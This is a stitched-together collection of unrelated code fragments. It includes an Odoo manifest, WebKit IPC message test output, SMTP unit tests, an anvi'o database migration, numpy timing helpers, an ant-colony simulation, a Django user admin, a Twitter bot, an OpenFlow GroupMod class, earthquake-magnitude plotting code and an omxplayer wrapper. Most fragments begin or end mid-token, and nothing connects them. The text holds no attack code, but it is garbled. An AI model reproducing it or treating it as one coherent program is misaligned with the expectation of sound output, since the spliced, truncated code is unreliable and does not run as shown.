3', ], "data": [ "data/tax_code_map_mod303_data.xml", "data/aeat_export_mod303_data.xml", 'wizard/l10n_es_aeat_compute_vat_prorrate_view.xml', 'views/mod303_view.xml' ], "installable": True, }
terials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY APPLE INC. AND ITS CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE * DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR ITS CONTRIBUTORS BE LIABLE FOR * ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR * SERVICES; LOSS OF USE, DATA,
OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ #ifndef WebPageMessages_h #define WebPageMessages_h #if ENABLE(WEBKIT2) #include "Arguments.h" #include "Connection.h" #include "MessageID.h" #include "Plugin.h" #include <WebCore/KeyboardEvent.h> #include <WebCore
/PluginData.h> #include <wtf/ThreadSafeRefCounted.h> #include <wtf/Vector.h> namespace CoreIPC { class ArgumentEncoder; class Connection; class MachPort; } namespace WTF { class String; } namespace WebKit { struct WebPreferencesStore; class WebTouchEvent; } namespace Messages { namespace WebPage { enum Kind { LoadURLID, #if ENABLE(TOUCH_EVENTS) TouchEventID, #endif DidReceivePolicyDecisionID, CloseID, PreferencesDidChangeID, SendDoubleAndFloatID, SendIntsID, CreatePluginID, RunJavaScriptAlertID, GetPluginsID, GetPluginProcessConnectionID, TestMultipleAttributesID, #if PLATFORM(MAC) DidCreateWebProcessConnectionID, #endif #if PLATFORM(MAC) InterpretKeyEventID, #endif }; struct LoadURL : CoreIPC::Arguments1<const WTF::String&> { static const Kind messageID = LoadURLID; typedef CoreIPC::Arguments1<const WTF::String&> DecodeType; explicit LoadURL(const WTF::String& url) : CoreIPC::Arguments1<const WTF::String&>(url) { } }; #if ENABLE(TOUCH_EVENTS) struct TouchEvent : CoreIPC::Arguments1<const WebKit::WebTouchEvent&> { static const Kind messageID = TouchEventID; typedef CoreIPC::Arguments1<const WebKit::WebTouchEvent&> DecodeType; explicit TouchEvent(const WebKit::WebTouchEvent& event) : CoreIPC::Arguments1<const WebKit::WebTouchEvent&>(event) { } }; #endif struct DidReceivePolicyDecision : CoreIPC::Arguments3<uint64_t, uint64_t, uint32_t> { static const Kind messageID = DidReceivePolicyDecisionID; typedef CoreIPC::Arguments3<uint64_t, uint64_t, uint32_t> DecodeType; DidReceivePolicyDecision(uint64_t frameID, uint64_t listenerID, uint32_t policyAction) : CoreIPC::Arguments3<uint64_t, uint64_t, uint32_t>(frameID, listenerID, policyAction) { } }; struct Close : CoreIPC::Arguments0 { static const Kind messageID = CloseID; typedef CoreIPC::Arguments0 DecodeType; }; struct PreferencesDidChange : CoreIPC::Arguments1<const WebKit::WebPreferencesStore&> { static const Kind messageID = PreferencesDidChangeID; typedef CoreIPC::Arguments1<const WebKit::WebPreferencesStore&> DecodeType; explicit PreferencesDidChange(const WebKit::WebPreferencesStore& store) : CoreIPC::Arguments1<const WebKit::WebPreferencesStore&>(store) { } }; struct SendDoubleAndFloat : CoreIPC::Arguments2<double, float> { static const Kind messageID = SendDoubleAndFloatID; typedef CoreIPC::Arguments2<double, float> DecodeType; SendDoubleAndFloat(double d, float f) : CoreIPC::Arguments2<double, float>(d, f) { } }; struct SendInts : CoreIPC::Arguments2<const Vector<uint64_t>&, const Vector<Vector<uint64_t> >&> { static const Kind messageID = SendIntsID; typedef CoreIPC::Arguments2<const Vector<uint64_t>&, const Vector<Vector<uint64_t> >&> DecodeType; SendInts(const Vector<uint64_t>& ints, const Vector<Vector<uint64_t> >& intVectors) : CoreIPC::Arguments2<const Vector<uint64_t>&, const Vector<Vector<uint64_t> >&>(ints, intVectors) { } }; struct CreatePlugin : CoreIPC::Arguments2<uint64_t, const WebKit::Plugin::Parameters&> { static const Kind messageID = CreatePluginID; typedef CoreIPC::Arguments1<bool&> Reply; typedef CoreIPC::Arguments2<uint64_t, const WebKit::Plugin::Parameters&> DecodeType; CreatePlugin(uint64_t pluginInstanceID, const WebKit::Plugin::Parameters& parameters) : CoreIPC::Arguments2<uint64_t, const WebKit::Plugin::Parameters&>(pluginInstanceID, parameters) { } }; struct RunJavaScriptAlert : CoreIPC::Arguments2<uint64_t, const WTF::String&> { static const Kind messageID = RunJavaScriptAlertID; typedef CoreIPC::Arguments0 Reply; typedef CoreIPC::Arguments2<uint64_t, const WTF::String&> DecodeType; RunJavaScriptAlert(uint64_t frameID, const WTF::String& message) : CoreIPC::Arguments2<uint64_t, const WTF::String&>(frameID, message) { } }; struct GetPlugins : CoreIPC::Arguments1<bool> { static const Kind messageID = GetPluginsID; typedef CoreIPC::Arguments1<Vector<WebCore::PluginInfo>&> Reply; typedef CoreIPC::Arguments1<bool> DecodeType; explicit GetPlugins(bool refresh) : CoreIPC::Arguments1<bool>(refresh) { } }; struct GetPluginProcessConnection : CoreIPC::Arguments1<const WTF::String&> { static const Kind messageID = GetPluginProcessConnectionID; struct DelayedReply : public ThreadSafeRefCounted<DelayedReply> { DelayedReply(PassRefPtr<CoreIPC::Connection>, PassOwnPtr<CoreIPC::ArgumentEncoder>); ~DelayedReply(); bool send(const CoreIPC::Connection::Handle& connectionHandle); private: RefPtr<CoreIPC::Connection> m_connection; OwnPtr<CoreIPC::ArgumentEncoder> m_arguments; }; typedef CoreIPC::Arguments1<CoreIPC::Connection::Handle&> Reply; typedef CoreIPC::Arguments1<const WTF::String&> DecodeType; explicit GetPluginProcessConnection(const WTF::String& pluginPath) : CoreIPC::Arguments1<const WTF::String&>(pluginPath) { } }; struct TestMultipleAttributes : CoreIPC::Arguments0 { static const Kind messageID = TestMultipleAttributesID; struct DelayedReply : public ThreadSafeRefCounted<DelayedReply> { DelayedReply(PassRefPtr<CoreIPC::Connection>, PassOwnPtr<CoreIPC::ArgumentEncoder>); ~DelayedReply(); bool send(); private: RefPtr<CoreIPC::Connection> m_connection; OwnPtr<CoreIPC::ArgumentEncoder> m_arguments; }; typedef CoreIPC::Arguments0 Reply; typedef CoreIPC::Arguments0 DecodeType; }; #if PLATFORM(MAC) struct DidCreateWebProcessConnection : CoreIPC::Arguments1<const CoreIPC::MachPort&> { static const Kind messageID = DidCreateWebProcessConnectionID; typedef CoreIPC::Arguments1<const CoreIPC::MachPort&> DecodeType; explicit DidCreateWebProcessConnection(const CoreIPC::MachPort& connectionIdentifier) : CoreIPC::Arguments1<const CoreIPC::MachPort&>(connectionIdentifier) { } }; #endif #if PLATFORM(MAC) struct InterpretKeyEvent : CoreIPC::Arguments1<uint32_t> { static const Kind messageID = InterpretKeyEventID; typedef CoreIPC::Arguments1<Vector<WebCore::KeypressCommand>&> Reply; typedef CoreIPC::Arguments1<uint32_t> DecodeType; explicit InterpretKeyEvent(uint32_t type) : CoreIPC::Arguments1<uint32_t>(type) { } }; #endif } // namespace WebPage } // namespace Messages namespace CoreIPC { template<> struct MessageKindTraits<Messages::WebPage::Kind> { static const MessageClass messageClass = MessageClassWebPage; }; } // namespace CoreIPC #endif // ENABLE(WEBKIT2) #endif // WebPageMessages_h """ _expected_receiver_implementation = """/* * Copyright (C) 2010 Apple Inc. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following
ost_func, default_func) = \ AbstractSMTPAccount.get_register_fields()[0] value = post_func("False", None, "user1@test.com") self.assertFalse(value) self.assertTrue(account12.default_account) def test_create_email(self): account11 = AbstractSMTPAccount(user=User(jid="user1@test.com"), name="account11", jid="account11@jmc.test.com") email = account11.create_email("from@test.com", "to@test.com", "subject", "body") self.assertEqual(email['From'], "from@test.com") self.assertEqual(email['To'], "to@test.com") self.assertEqual(email['Subject'], "subject") self.assertEqual(email.get_payload(), "body") def test_create_email_other_headers(self): account11 = AbstractSMTPAccount(user=User(jid="user1@test.com"), name="account11", jid="account11@jmc.test.com") email = account11.create_email("from@test.com", "to@test.com", "subject", "body", {"Bcc": "bcc@test.com", "Cc": "cc@test.com"}) self.assertEqual(email['From'], "from@test.com") self.assertEqual(email['To'], "to@test.com") self.assertEqual(email['Subject'], "subject") self.assertEqual(email['Bcc'], "bcc@test.com") self.assertEqual(email['Cc'], "cc@test.com") self.assertEqual(email.get_payload(), "body") class SMTPAccount_TestCase(Account_TestCase): def setUp(self): JCLTestCase.setUp(self, tables=[Account, ExampleAccount, User, GlobalSMTPAccount, AbstractSMTPAccount, SMTPAccount]) self.account_class = SMTPAccount def make_test(self, responses=None, queries=None, core=None): def inner(): self.server = server.DummyServer("localhost", 1025) thread.start_new_thread(self.server.serve, ()) self.server.responses = [] if responses: self.server.responses += responses self.server.responses += ["221 localhost closing connection\r\n"] self.server.queries = [] if queries: self.server.queries += queries self.server.queries += ["quit\r\n"] if core: model.db_connect() core(self) model.db_disconnect() self.failUnless(self.server.verify_queries()) return inner def test_send_email_esmtp_no_auth(self): model.db_connect() smtp_account = SMTPAccount(user=User(jid="user1@test.com"), name="account11", jid="account11@jmc.test.com") smtp_account.host = "localhost" smtp_account.port = 1025 model.db_disconnect() email = smtp_account.create_email("from@test.com", "to@test.com", "subject", "body") test_func = self.make_test(["220 localhost ESMTP\r\n", "250-localhost Hello 127.0.0.1\r\n" + "250-SIZE 52428800\r\n" + "250-PIPELINING\r\n" + "250 HELP\r\n", "250 OK\r\n", "250 Accepted\r\n", "354 Enter message\r\n", None, None, None, None, None, None, None, None, "250 OK\r\n"], ["ehlo .*\r\n", "mail FROM:<" + str(email['From']) + ">.*", "rcpt TO:<" + str(email['To']) + ">\r\n", "data\r\n"] + email.as_string().split("\n") + [".\r\n"], lambda self: \ smtp_account.send_email(email)) test_func() def test_send_email_no_auth(self): model.db_connect() smtp_account = SMTPAccount(user=User(jid="user1@test.com"), name="account11", jid="account11@jmc.test.com") smtp_account.host = "localhost" smtp_account.port = 1025 model.db_disconnect() email = smtp_account.create_email("from@test.com", "to@test.com", "subject", "body") test_func = self.make_test(["220 localhost SMTP\r\n", "504 ESMTP not supported\r\n", "250-localhost Hello 127.0.0.1\r\n" + "250-SIZE 52428800\r\n" + "250-PIPELINING\r\n" + "250 HELP\r\n", "250 OK\r\n", "250 Accepted\r\n", "354 Enter message\r\n", None, None, None, None, None, None, None, None, "250 OK\r\n"], ["ehlo .*\r\n", "helo .*\r\n", "mail FROM:<" + str(email['From']) + ">.*", "rcpt TO:<" + str(email['To']) + ">\r\n", "data\r\n"] + email.as_string().split("\n") + [".\r\n"], lambda self: \ smtp_account.send_email(email)) test_func() def test_send_email_esmtp_auth(self): model.db_connect() smtp_account = SMTPAccount(user=User(jid="user1@test.com"), name="account11", jid="account11@jmc.test.com") smtp_account.host = "localhost" smtp_account.port = 1025 smtp_account.login = "user" smtp_account.password = "pass" model.db_disconnect() email = smtp_account.create_email("from@test.com", "to@test.com", "subject", "body") test_func = self.make_test(["220 localhost ESMTP\r\n", "250-localhost Hello 127.0.0.1\r\n" + "250-SIZE 52428800\r\n" + "250-AUTH PLAIN LOGIN CRAM-MD5\r\n" + "250-PIPELINING\r\n" + "250 HELP\r\n", "334 ZGF4IDNmNDM2NzY0YzBhNjgyMTQ1MzhhZGNiMjE2YTYxZjRm\r\n", "235 Authentication succeeded\r\n",
"250 OK\r\n", "250 Accepted\r\n",
"354 Enter message\r\n", None, None, None, None, None, None, None, None, "250 OK\r\n"], ["ehlo .*\r\n", "AUTH CRAM-MD5\r\n", ".*\r\n", "mail FROM:<" + str(email['From']) + ">.*",
#!/usr/bin/env python # -*- coding: utf-8 import sys import argparse from ete3 import Tree import anvio.db as db import anvio.utils as utils import anvio.terminal as terminal from anvio.errors import ConfigError run = terminal.Run() progress = terminal.Progress() current_version, next_version = [x[1:] for x in __name__.split('_to_')] item_orders_table_name = 'item_orders' item_orders_table_structure = ['name', 'type', 'data'] item_orders_table_types = ['text', 'text', 'text'] layer_orders_table_name = 'layer_orders' layer_orders_table_structure = ['data_key', 'data_type', 'data_value'] layer_orders_table_types = [ 'text' , 'text' , 'text' ] def migrate(db_path): if db_path is None: raise ConfigError("No database path is given.") # make sure someone is not being funny utils.is_profile_db(db_path) # make sure the version is accurate profile_db = db.DB(db_path, None, ignore_version = True) if str(profile_db.get_version()) != current_version: raise ConfigError("Version of this profile database is not %s (hence, this script cannot really do anything)." % current_version) # migrate item orders item_orders = profile_db.get_table_as_dict(item_orders_table_name) for order_name in ite
m_orders: if item_orders[order_name]['type'] == 'newick': newick = Tree(item_orders[order_name]['data'], format=1) newick = newick.write(format=2) profile_db._exec("""UPDATE %s SET "data" = ? WHERE "name" LIKE ?""" % item_orders_table_name, (newick, order_name)) # migrate layer orders layer_orders = profile_db.get_table_as_dict(layer_orders_table_name) for order_name in layer_orders: if layer_orders[or
der_name]['data_type'] == 'newick': newick = Tree(layer_orders[order_name]['data_value'], format=1) newick = newick.write(format=2) profile_db._exec("""UPDATE %s SET "data_value" = ? WHERE "data_key" LIKE ?""" % layer_orders_table_name, (newick, order_name)) # set the version profile_db.remove_meta_key_value_pair('version') profile_db.set_version(next_version) # bye profile_db.disconnect() progress.end() run.info_single('Your profile db is now %s. Aww, yisss.' % next_version, nl_after=1, nl_before=1, mc='green') if __name__ == '__main__': parser = argparse.ArgumentParser(description='A simple script to upgrade profile database from version %s to version %s' % (current_version, next_version)) parser.add_argument('profile_db', metavar = 'PROFILE_DB', help = "An anvi'o profile database of version %s" % current_version) args, unknown = parser.parse_known_args() try: migrate(args.profile_db) except ConfigError as e: print(e) sys.exit(-1)
import numpy as np import warnings def mean_time(t, min_threshold=0, max_threshold=1
253): """ Take a switch probability result array from the PreAmp timer, and compute mean switching time using the specified thresholds. Timing data is assumed to be a numpy array. """ t = t[np.logical_and(t > min_threshold, t < max_threshold)] if np.size(t) > 0: t_mean = np.mean(t) t_std = np.std(t) else: t_mean = np.nan t_std = np.nan return t_mean, t_std def mean_ti
me_diff(t, min_threshold=0, max_threshold=1253): """ Take a switch probability result array from the PreAmp timers, and compute mean switching time using the specified thresholds. """ dt = t[0][:] - t[1][:] t0_mask = np.logical_and(t[0,:] > min_threshold, t[0,:] < max_threshold) t1_mask = np.logical_and(t[1,:] > min_threshold, t[1,:] < max_threshold) dt = dt[np.logical_and(t0_mask, t1_mask)] if np.size(dt) > 0: dt_mean = np.mean(dt) dt_std = np.std(dt) else: dt_mean = np.nan dt_std = np.nan return dt_mean, dt_std def prob(t, min_threshold=0, max_threshold=1253): """ Take a switch probability result array from the PreAmp timer, and compute switching probability using the specified thresholds. """ return float(np.size(t[np.logical_and(t > min_threshold, t < max_threshold)])) / float(np.size(t)) def outcomes(t, min_threshold=0, max_threshold=1253): """ Take a switch probability result array from the PreAmp timer, and convert to a numpy array of 0 or 1 based on the thresholds. """ def _threshold(x): if x > min_threshold and x < max_threshold: return 1 else: return 0 threshold_vectorized = np.vectorize(_threshold) return threshold_vectorized(t) def corr_coef_from_outcomes(outcomes): """ Compute correrlation coefficient from an array of switching outcomes. """ with warnings.catch_warnings(): warnings.simplefilter("ignore") return np.corrcoef(outcomes[0,:], outcomes[1,:])[0,1] def software_demod(t, freq, Is, Qs): """ Demodulate I and Q data in software. This method uses ADC frequency for demodulation. Input: t: time vector during which to demodulate data (ns). freq: demodulation frequency (GHz). Is: I data. Qs: Q data. Output: Id, Qd: demodulated I and Q. """ demod = 2 * np.pi * t * freq Sv = np.sin(demod) Cv = np.cos(demod) Id = np.mean(Is * Cv - Qs * Sv) Qd = np.mean(Is * Sv + Qs * Cv) return Id, Qd
from edge import DummyEdgeEnd from simulation_event import AbstractSimulationEvent from stats import TripStats class AbstractAntMove(AbstractSimulationEvent): def __init__(self, ant, origin,
destination, end_time, pheromone_to_drop, trip_stats): self.ant = ant self.origin = origin self.destination = de
stination if self.origin is not None and self.destination is not None: if self.origin.edge is not None and self.destination.edge is not None: #print 'origin', self.origin #print 'destination', self.destination assert self.origin.edge == self.destination.edge self.end_time = end_time self.pheromone_to_drop = pheromone_to_drop self.trip_stats = trip_stats def process_start(self): self.origin.drop_pheromone(self.pheromone_to_drop) return frozenset((self.origin.edge, self.origin.point)) def process_end(self, reality, stats): changed = [self.destination.edge] self.trip_stats.edge_visited(self.destination.edge) self.destination.drop_pheromone(self.pheromone_to_drop) if not self.destination.point.is_anthill() and self.destination.point.food > 0 and not self.ant.food: # ant has found the food changed.append(self.destination.point) self.trip_stats.food_found() self.destination.point.food -= 1 self.ant.food += 1 stats.food_found(self.trip_stats) stats.present() elif self.destination.point.is_anthill(): # ant has returned to the anthill if self.ant.food: # with food changed.append(self.destination.point) self.destination.point.food += self.ant.food self.trip_stats.back_home() new_ant = self.ant.__class__(self.ant.world_parameters) return AntRestartMove(new_ant, anthill=DummyEdgeEnd(self.destination.point), end_time=reality.world.elapsed_time), frozenset(changed) else: # with no food self.trip_stats.reset_route() new_destination_edge, pheromone_to_drop = self.ant.tick(self.destination.point) assert new_destination_edge in (end.edge for end in self.destination.point.edge_ends), 'Illegal ant move' assert reality.environment_parameters.min_pheromone_dropped_by_ant <= pheromone_to_drop <= reality.environment_parameters.max_pheromone_dropped_by_ant, 'Illegal ant pheromone drop: %s' % (repr(pheromone_to_drop),) self.trip_stats.normal_move(new_destination_edge.cost) new_destination = new_destination_edge.get_other_end_by_point(self.destination.point) origin = new_destination_edge.get_other_end(new_destination) end_time = reality.world.elapsed_time + new_destination_edge.cost return AntMove( ant=self.ant, origin=origin, destination=new_destination, end_time=end_time, pheromone_to_drop=pheromone_to_drop, trip_stats=self.trip_stats, ), frozenset(changed) def __repr__(self): return '%s@%s' % (self.__class__.__name__, self.end_time,) class AntRestartMove(AbstractAntMove): def __init__(self, ant, anthill, end_time): super(AntRestartMove, self).__init__(ant, None, anthill, end_time=end_time, pheromone_to_drop=0, trip_stats=TripStats()) def process_start(self): return frozenset() class AntStartMove(AntRestartMove): def __init__(self, ant, anthill): super(AntStartMove, self).__init__(ant, anthill, end_time=0) class AntMove(AbstractAntMove): pass
''' from https://docs.djangoproject.com/en/1.7/topics/auth/customizing/#specifying-a-custom-user-model ''' from django import forms from django.contrib import admin from django.contrib.auth.admin import UserAdmin from django.contrib.auth.forms import ReadOnlyPasswordHashField from django.utils.translation import gettext_lazy as _ from custom_user.models import User class UserCreationForm(forms.ModelForm): """ A form for creating new users. Includes all the required fields, plus a repeated password. """ password1 = forms.CharField(label=_('Password'), widget=forms.PasswordInput) password2 = forms.CharField(label=_('Password confirmation'), widget=forms.PasswordInput) class Meta: model = User fields = ('email',) def clean_password2(self): # Check that the two password entries match password1 = self.cleaned_data.get("password1") password2 = self.cleaned_data.get("password2") if password1 and password2 and password1 != password2: raise forms.ValidationError(_("Passwords don't match")) return password2 def save(self, commit=True): # Save the provided password in hashed format user = super(UserCreationForm, self).save(commit=False) user.set_password(self.cleaned_data["password1"]) if commit: user.save() return user class UserChangeForm(forms.ModelForm): """A form for updating users. Includes all the fields on the user, but replaces the password field with admin's password hash d
isplay field. """ password = ReadOnlyPasswordHashField() class Meta: model = User fields = ('email', 'password', 'is_active', 'is_superuser') def clean_password(self): # Regardless of what the user provides, return the initial value. # This is done here, rath
er than on the field, because the # field does not have access to the initial value return self.initial["password"] class MyUserAdmin(UserAdmin): # The forms to add and change user instances form = UserChangeForm add_form = UserCreationForm # The fields to be used in displaying the User model. # These override the definitions on the base UserAdmin # that reference specific fields on auth.User. list_display = ('email', 'is_superuser') list_filter = ('is_superuser',) fieldsets = ( (None, {'fields': ('email','name', 'password', 'family')}), ('Permissions', {'fields': ('is_superuser','is_active',)}), ('Settings', {'fields': ('language','receive_update_emails','receive_photo_update_emails')}), ) # add_fieldsets is not a standard ModelAdmin attribute. UserAdmin # overrides get_fieldsets to use this attribute when creating a user. add_fieldsets = ( (None, { 'classes': ('wide',), 'fields': ('email', 'password1', 'password2')} ), ) search_fields = ('email',) ordering = ('email',) filter_horizontal = () raw_id_fields = ('family',) # Now register the new UserAdmin... admin.site.register(User, MyUserAdmin)
# coding: utf-8 __author__ = "@strizhechenko" import sys from morpher import Morpher from twitterbot_utils import Twibot from apscheduler.schedulers.blocking import BlockingScheduler sched = BlockingScheduler() bot = Twibot() morphy = Morpher() def tweets2words(tweets): string = " ".joi
n([tweet.text for tweet in tweets]) return morphy.process_to_words(string) @sched.scheduled_job('interval', minutes=15) def do_tweets(): print 'New tick' words = tweets2words(bot.fetch_list(list_id=217926157)) for word in words: tweet = morphy.word2phrase(word) bot.tweet(tweet) print 'post', tweet.encode('utf-8') @sched.sche
duled_job('interval', hours=24) def do_wipe(): print 'Wipe time' bot.wipe() if __name__ == '__main__': do_tweets() if '--test' in sys.argv: exit(0) sched.start()
"""Modify Group Entry Message.""" from enum import IntEnum from pyof.foundation.base import GenericMessage from pyof.foundation.basic_types import ( FixedTypeList, Pad, UBInt8, UBInt16, UBInt32) from pyof.v0x04.common.header import Header, Type from pyof.v0x04.controller2switch.common import Bucket __all__ = ('GroupMod', 'GroupModCommand', 'GroupType', 'Group', 'ListOfBuckets') class Group(IntEnum): """Group numbering. Groups can use any number up to attr:`OFPG_MAX`.""" #: Last usable group number. OFPG_MAX = 0xffffff00 #: Fake groups. #: Represents all groups for group delete commands. OFPG_ALL = 0xfffffffc #: Wildcard group used only for flow stats requests. # Select all flows regardless of group (including flows with no group). OFPG_ANY = 0xffffffff class GroupModCommand(IntEnum): """Group commands.""" #: New group. OFPGC_ADD = 0 #: Modify all matching groups. OFPGC_MODIFY = 1 #: Delete all matching groups. OFPGC_DELETE = 2 class GroupType(IntEnum): """Group types. Range [128, 255] is reserved for experimental use.""" #: All (multicast/broadcast) group. OFPGT_ALL = 0 #: Select group. OFPGT_SELECT = 1 #: Indirect group. OFPGT_INDIRECT = 2 #: Fast failover group. OFPGT_FF = 3 class ListOfBuckets(FixedTypeList): """List of buckets. Represented by instances of Bucket. """ def __init__(self, items=None): """Create a ListOfBuckets with the optional parameters below. Args: items (B
ucket): Instance or a list of instances. """ super().__init__(pyof_class=Bucket, items=items) class GroupMod(GenericMessage): """Group setup and teardown (controller -> datapath).""" header = Header(message_type=Type.OFPT_GROUP_MOD) command = UBInt16(enum_ref=GroupModCommand) group_type = UBInt8() #: Pad to 64 bits. pad = Pad(1) group_id = UBInt32() buckets = ListOfBuckets()
def __init__(self, xid=None, command=None, group_type=None, group_id=None, buckets=None): """Create a GroupMod with the optional parameters below. Args: xid (int): Header's transaction id. Defaults to random. command (GroupModCommand): One of OFPGC_*. group_type (GroupType): One of OFPGT_*. group_id (int): Group identifier. buckets (:class:`ListOfBuckets`): The length of the bucket array is inferred from the length field in the header. """ super().__init__(xid) self.command = command self.group_type = group_type self.group_id = group_id self.buckets = buckets
r to be rendered on top (True) or closes the figure for plotting (False) :param list xlim: Lower and upper bounds for x-axis :param list ylim: Lower and upper bounds for y-axis """ if not data: print("No pairs found - abandoning plot!") return fig = plt.figure(figsize=figure_size) keys = list(data.keys()) plt.errorbar(data[keys[0]], data[keys[2]], xerr=data[keys[1]], yerr=data[keys[3]], marker=marker, mfc="b", mec="k", ls="None", ecolor="r") plt.xlabel(utils._to_latex(keys[0]), fontsize=16) plt.ylabel(utils._to_latex(keys[2]), fontsize=16) plt.grid(True) if len(xlim) == 2: lowx = xlim[0] highx = xlim[1] else: lowx = np.floor(np.min(data[keys[0]])) highx = np.ceil(np.max(data[keys[0]])) if len(ylim) == 2: lowy = ylim[0] highy = ylim[1] else: lowy = np.floor(np.min(data[keys[2]])) highy = np.ceil(np.max(data[keys[2]])) if lowy < lowx: lowx = lowy if highy > highx: highx = highy plt.ylim(lowx, highx) plt.xlim(lowx, highx) # Overlay 1:1 line plt.plot(np.array([lowx, highx]), np.array([lowx, highx]), ls="--", color=[0.5, 0.5, 0.5], zorder=1) plt.tight_layout() if filename: utils._save_image(filename, filetype, resolution) if not overlay: plt.show() return data def sample_agency_magnitude_pairs(data, xbins, ybins, number_samples=1): """ """ keys = list(data.keys()) n_data = len(data[keys[0]]) if not number_samples or (number_samples == 1): # Only one sample, return simple histogram #print xbins, ybins return np.histogram2d(np.around(data[keys[0]], 2), np.around(data[keys[2]], 2), bins=[xbins, ybins])[0] elif (np.max(data[keys[1]]) < 1E-15) and (np.max(data[keys[3]]) < 1E-15): # No uncertainty on magnitudes return np.histogram2d(np.around(data[keys[0]], 2), np.around(data[keys[2]], 2), bins=[xbins, ybins])[0] else: counter = np.zeros([len(xbins) - 1, len(ybins) - 1]) for i in range(number_samples): # Sample data sets data_x = data[keys[0]] + data[keys[1]] * np.random.normal(0., 1., n_data) data_y = data[keys[2]] + data[keys[3]] * np.random.normal(0., 1., n_data) counter += np.histogram2d(data_x, data_y, bins=[xbins, ybins])[0] return counter / float(number_samples) def plot_agency_magnitude_density(data, overlay=False, number_samples=0, xlim=[], ylim=[], figure_size=(7, 8), lognorm=True, filetype="png", resolution=300, filename=None): """ Creates a density plot of the earthquakes corresponding to an agency-magnitude combination """ keys = list(data.keys()) if not data: print("No pairs found - abandoning plot!") return if len(xlim) == 2: lowx = xlim[0] highx = xlim[1] else: lowx = np.floor(np.min(data[keys[0]])) highx = np.ceil(np.max(data[keys[0]])) if len(ylim) == 2: lowy = ylim[0] highy = ylim[1] else: lowy = np.floor(np.min(data[keys[2]])) highy = np.ceil(np.max(data[keys[2]])) if lowy < lowx: lowx = lowy if highy > highx: h
ighx = highy xbins = np.linspace(lowx - 0.05, highx + 0.05, ((highx + 0.05 - lowx - 0.05) / 0.1) + 2.0) ybins = np.linspace(lowx - 0.05, highx + 0.05, ((highx + 0.05 - lowx - 0.05) / 0.1) + 2.0) density = sample_agency_magnitude_pairs(data, xbins, ybins, number_samples) fig = plt.figure
(figsize=figure_size) if lognorm: cmap = deepcopy(matplotlib.cm.get_cmap("jet")) data_norm = LogNorm(vmin=0.1, vmax=np.max(density)) else: cmap = deepcopy(matplotlib.cm.get_cmap("jet")) cmap.set_under("w") data_norm = Normalize(vmin=0.1, vmax=np.max(density)) #density[density < 1E-15] == np.nan plt.pcolormesh(xbins[:-1] + 0.05, ybins[:-1] + 0.05, density.T, norm=data_norm, cmap=cmap) cbar = plt.colorbar() cbar.set_label("Number Events", fontsize=16) plt.xlabel(utils._to_latex(keys[0]), fontsize=16) plt.ylabel(utils._to_latex(keys[2]), fontsize=16) plt.grid(True) plt.ylim(lowx, highx) plt.xlim(lowx, highx) # Overlay 1:1 line plt.plot(np.array([lowx, highx]), np.array([lowx, highx]), ls="--", color=[0.5, 0.5, 0.5], zorder=1) plt.tight_layout() if filename: utils._save_image(filename, filetype, resolution) if not overlay: plt.show() return data DEFAULT_SIGMA = {"minimum": lambda x : np.nanmin(x), "maximum": lambda x : np.nanmax(x), "mean": lambda x : np.nanmean(x)} def extract_scale_agency(key): """ Extract the magnitude scale and the agency from within the parenthesis Cases: "Mw(XXX)" or "Mw(XXX) & Mw (YYY)" or "Mw(XXX) & Ms(YYY)" """ # Within parenthesis compiler wip = re.compile(r'(?<=\()[^)]+(?=\))') # Out of parenthesis compiler oop = re.compile(r'(.*?)\(.*?\)') # Get the agencies agencies = wip.findall(key) if len(agencies) == 1: # Simple case - only one agency # Get the scale scale = oop.findall(key) return scale[0], agencies[0] elif len(agencies) > 1: # Multiple agencies agencies = "|".join(agencies) scales = oop.findall(key) # Strip any spaces and '&' nscales = [] for scale in scales: scale = scale.replace("&", "") scale = scale.replace(" ", "") nscales.append(scale) if nscales.count(nscales[0]) == len(nscales): # Same magnitude scale scales = nscales[0] else: # join scales scales = "|".join(nscales) return scales, agencies else: raise ValueError("Badly formatted key %s" % key) class CatalogueRegressor(object): """ Class to perform an orthodonal distance regression on a pair of magnitude data tuples :param dict data: Output of agency-magnitude query :param common_catalogue: Catalogue of common events as instance of :class: CatalogueDB :param list keys(): List of keys in the data set :param model: Regression model (eventually as instance of :class: scipy.odr.Model) :param regression_data: Regression data (eventually as instance of :class: scipy.ord.RealData) :param results: Regression results as instance of :class: scipt.odr.Output :param str model_type: Type of model used for regression """ def __init__(self, data, common_catalogue=None): """ Instantiate with data """ self.data = data self.common_catalogue = common_catalogue self.keys = list(self.data.keys()) # Retrieve the scale and agency information from keys self.x_scale, self.x_agency = extract_scale_agency(self.keys[0]) self.y_scale, self.y_agency = extract_scale_agency(self.keys[2]) self.model = None self.regression_data = None self.results = None self.model_type = None self.standard_deviation = None @classmethod def from_catalogue(cls, catalogue, pair1, pair2, no_case=False): """ Class method to instansiate the regression object with the agency- magnitude query parameters :param catalogue: Earthquake catalogue as instance of :class: CatalogueDB :params tuple pair1: Agency and magnitude combination (Agency, Magnitude Type) for defining the independent variable :params tuple pair2:
import socket from subprocess import Popen, PIPE, STDOUT import os import time import string import requests import json import omxplayer class UnsupportedFileTypeException(Exception): '''Raised if the file type is not among the list of supported types''' pass class FileNotFoundException(Exception): '''raised if the file is not valid''' pass class OmxCommsError(Exception): '''raised if a command failed to execute''' pass class Omx(object): def __init__(self): # connection attrs # private playlist var, stores list of file paths # mirrors the list
in the player at all times self._playlist = [] self._player = None # used to dete
